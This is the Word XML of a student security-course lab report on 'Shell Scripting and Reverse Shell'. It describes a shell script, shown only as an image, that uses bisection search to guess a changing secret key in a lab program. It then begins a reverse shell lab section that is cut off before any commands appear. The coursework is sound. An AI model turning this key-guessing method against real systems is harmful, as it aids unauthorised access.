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9FD94E" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRPr="005565EB" w:rsidRDefault="001F5F65" w:rsidP="00F85ACF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bookmarkStart w:id="0" w:name="_Hlk93919266"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5C24A6FE" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRPr="005565EB" w:rsidRDefault="001F5F65" w:rsidP="00F85ACF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05274035" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRPr="005565EB" w:rsidRDefault="001F5F65" w:rsidP="00F85ACF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DD6F43D" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="001F5F65" w:rsidP="00F85ACF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3E0D211" w14:textId="0AE8E66D" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="00913009" w:rsidP="00F85ACF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913009">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shell Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CB4B7" w14:textId="77777777" w:rsidR="00A671D8" w:rsidRPr="007A25AB" w:rsidRDefault="00A671D8" w:rsidP="00F85ACF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2E7A53A" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="001F5F65" w:rsidP="00F85ACF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A25AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chawin Metah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA6DBF" w14:textId="77777777" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="001F5F65" w:rsidP="00F85ACF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A25AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Department of Computer Science, Purdue University Fort Wayne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1123C2" w14:textId="2F301B71" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="00522067" w:rsidP="00F85ACF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522067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACS 545</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>000:</w:t>
      </w:r>
      <w:r w:rsidRPr="00522067">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cryptography and Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E95AE8E" w14:textId="4A8D1436" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="00522067" w:rsidP="00F85ACF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b</w:t>
      </w:r>
      <w:r w:rsidR="00045840" w:rsidRPr="007A25AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5658B4" w14:textId="309FED9E" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="0041624D" w:rsidP="00F85ACF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1624D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dr. Zesheng Chen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E95A011" w14:textId="71981836" w:rsidR="001F5F65" w:rsidRPr="007A25AB" w:rsidRDefault="00522067" w:rsidP="00F85ACF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nuary</w:t>
      </w:r>
      <w:r w:rsidR="001F5F65" w:rsidRPr="007A25AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD06E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="001F5F65" w:rsidRPr="007A25AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EAB12F" w14:textId="3974F161" w:rsidR="00F24C16" w:rsidRPr="007A25AB" w:rsidRDefault="00F24C16" w:rsidP="00F85ACF">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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7A25AB"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52F08936" w14:textId="77777777" w:rsidR="001A55D9" w:rsidRDefault="00DC3320" w:rsidP="00F85ACF">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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913009">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shell Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027555A" w14:textId="1F3E91A6" w:rsidR="00841796" w:rsidRPr="00C5492A" w:rsidRDefault="00C5492A" w:rsidP="00C5492A">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, I wrote the shell script that able to find </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5492A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a correct secret key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> in prob1 file </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5492A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>within a second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Let us begin with testing the file. I first run the file without giving an argument and then put in two random ones, as shown in Figure 1.</w:t>
      </w:r>
      <w:r w:rsidR="006A08C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> It returned value correctly as shown in the instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A45BC2" w14:textId="77777777" w:rsidR="00F413ED" w:rsidRPr="00F413ED" w:rsidRDefault="00F413ED" w:rsidP="00F413ED">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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F413ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589DB06" w14:textId="15447F4D" w:rsidR="00F413ED" w:rsidRDefault="00C5492A" w:rsidP="00F413ED">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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Test prob1 file</w:t>
      </w:r>
      <w:r w:rsidR="006A08C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152A7593" wp14:editId="217F40E4">
            <wp:extent cx="5943600" cy="3865245"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="17" name="Picture 17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 descr="Graphical user interface, text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65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BF453D" w14:textId="77777777" w:rsidR="006A08C5" w:rsidRDefault="006A08C5" w:rsidP="006A08C5">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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  <w:t xml:space="preserve">After that, I created shell script file </w:t>
      </w:r>
      <w:r w:rsidRPr="006A08C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b1_solution.sh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using the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE88F5" w14:textId="0668A026" w:rsidR="006A08C5" w:rsidRPr="006A08C5" w:rsidRDefault="006A08C5" w:rsidP="006A08C5">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vi prob1_solution.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ACBB27" w14:textId="45BE5041" w:rsidR="00304A10" w:rsidRDefault="006A08C5" w:rsidP="006A08C5">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30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This program will repeatedly guess </w:t>
      </w:r>
      <w:r w:rsidRPr="006A08C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command line argument “guess_number”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to compare with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5492A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>secret key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> in prob1 file</w:t>
      </w:r>
      <w:r w:rsidR="00304A10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, which will change every one second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31199805" w14:textId="77777777" w:rsidR="00304A10" w:rsidRDefault="00304A10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Angsana New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D558AE5" w14:textId="69500031" w:rsidR="008A50B8" w:rsidRDefault="00304A10" w:rsidP="006A08C5">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="006A08C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prob1_solution.sh</w:t>
      </w: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shell script use bisection search algorithm to seek for the secret key. The program and its flow chart are shown in Figure 2 and 3.</w:t>
      </w:r>
      <w:r w:rsidR="00B945E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For simplicity, I did not include “NOT found” case in the flow chart. NOT found will only show if guess_number of a previous iteration is equal to current </w:t>
      </w:r>
      <w:r w:rsidR="00B945E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guess_number</w:t>
      </w:r>
      <w:r w:rsidR="00B945E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. That means the program has search through the range of 0 to 2147483647 and </w:t>
      </w:r>
      <w:r w:rsidR="00B945E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guess_number</w:t>
      </w:r>
      <w:r w:rsidR="00B945E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does not match with the</w:t>
      </w:r>
      <w:r w:rsidR="00520405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secret</w:t>
      </w:r>
      <w:r w:rsidR="00B945E0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key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3B2FB" w14:textId="64D32FCB" w:rsidR="00476135" w:rsidRPr="00F413ED" w:rsidRDefault="00476135" w:rsidP="00476135">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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F413ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B62D51" w14:textId="239A2214" w:rsidR="00476135" w:rsidRDefault="00476135" w:rsidP="00476135">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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476135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prob1_solution.sh shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717BF06E" w14:textId="0885A348" w:rsidR="00476135" w:rsidRDefault="00476135" w:rsidP="00476135">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22401B9E" wp14:editId="6760D2D8">
            <wp:extent cx="5943600" cy="484314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843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1AEE7B" w14:textId="17D558A4" w:rsidR="00E51C14" w:rsidRDefault="008456A7" w:rsidP="008456A7">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55B827" w14:textId="2D56DDA6" w:rsidR="00E51C14" w:rsidRPr="00F413ED" w:rsidRDefault="00E51C14" w:rsidP="00E51C14">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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F413ED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Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B509FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19869746" w14:textId="5123A9E1" w:rsidR="00E51C14" w:rsidRDefault="00E51C14" w:rsidP="00E51C14">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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 xml:space="preserve">Flow chart of </w:t>
      </w:r>
      <w:r w:rsidRPr="00476135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prob1_solution.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B660982" w14:textId="09B95996" w:rsidR="00E51C14" w:rsidRDefault="00B945E0" w:rsidP="00B509FE">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="12889" w:dyaOrig="7668" w14:anchorId="3BB14A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8pt;height:278.65pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.15" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1704728958" r:id="rId10"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2FD8B" w14:textId="528F918B" w:rsidR="00E51C14" w:rsidRDefault="00772EB0" w:rsidP="00B509FE">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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  <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidR="00B509FE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before running the program, I use the following command to allow the shell script to be executed as shown in Figure 4.</w:t>
      </w:r>
      <w:r w:rsidR="008B4CC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This can be seen when we use </w:t>
      </w:r>
      <w:r w:rsidR="008B4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="008B4CC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
      <w:r w:rsidR="00D92AD8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; the name of the file will change from black to green (executable).</w:t>
      </w:r>
      <w:r w:rsidR="008B4CC2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</w:p>
    <w:p w14:paraId="770B35EE" w14:textId="174C9D69" w:rsidR="008B4CC2" w:rsidRDefault="00D92AD8" w:rsidP="008B4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chmod +x prob1_solution.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8C3E0" w14:textId="128363F5" w:rsidR="008B4CC2" w:rsidRPr="00F413ED" w:rsidRDefault="008B4CC2" w:rsidP="008B4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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F413ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F4343" w14:textId="59AADB50" w:rsidR="008B4CC2" w:rsidRDefault="008B4CC2" w:rsidP="008B4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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Enable execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0447D7" w14:textId="46F12B76" w:rsidR="00EE19F7" w:rsidRDefault="008B4CC2" w:rsidP="008B4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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 w:hint="cs"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="696B244A" wp14:editId="6F0AEE27">
            <wp:extent cx="5943600" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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7105"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="127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1D3711" w14:textId="77777777" w:rsidR="00EE19F7" w:rsidRDefault="00EE19F7">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E097A" w14:textId="5F2C7AEF" w:rsidR="00EE19F7" w:rsidRPr="00F413ED" w:rsidRDefault="00EE19F7" w:rsidP="00EE19F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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F413ED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Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E9012" w14:textId="1142D37A" w:rsidR="00EE19F7" w:rsidRDefault="00EE19F7" w:rsidP="00EE19F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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The result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4429DB08" w14:textId="19FDFE83" w:rsidR="00EE19F7" w:rsidRDefault="00EE19F7" w:rsidP="00EE19F7">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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 w:hint="cs"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CCC3190" wp14:editId="7A9AA6CD">
            <wp:extent cx="5943600" cy="4563745"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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563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28E54B" w14:textId="77777777" w:rsidR="008B4CC2" w:rsidRDefault="008B4CC2" w:rsidP="008B4CC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:cs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF5C00C" w14:textId="50445DE5" w:rsidR="008456A7" w:rsidRDefault="00E51C14" w:rsidP="008456A7">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E969DA2" w14:textId="0D70F388" w:rsidR="005F75D1" w:rsidRDefault="00DC3320" w:rsidP="00BE5FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="480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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62683881" w14:textId="1FCDFB7F" w:rsidR="00501836" w:rsidRDefault="00501836" w:rsidP="00BE5FFD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ab/>
      </w:r>
      <w:r w:rsidR="002B67EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To begin, I obtained the Labsetup.zip file from Brightspace and unzip using unzip command</w:t>
      </w:r>
      <w:r w:rsidR="006126DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get docker-compose.yml</w:t>
      </w:r>
      <w:r w:rsidR="002B67EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown </w:t>
      </w:r>
      <w:r w:rsidR="002B67EA" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in Figure </w:t>
      </w:r>
      <w:r w:rsidR="0041004D" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
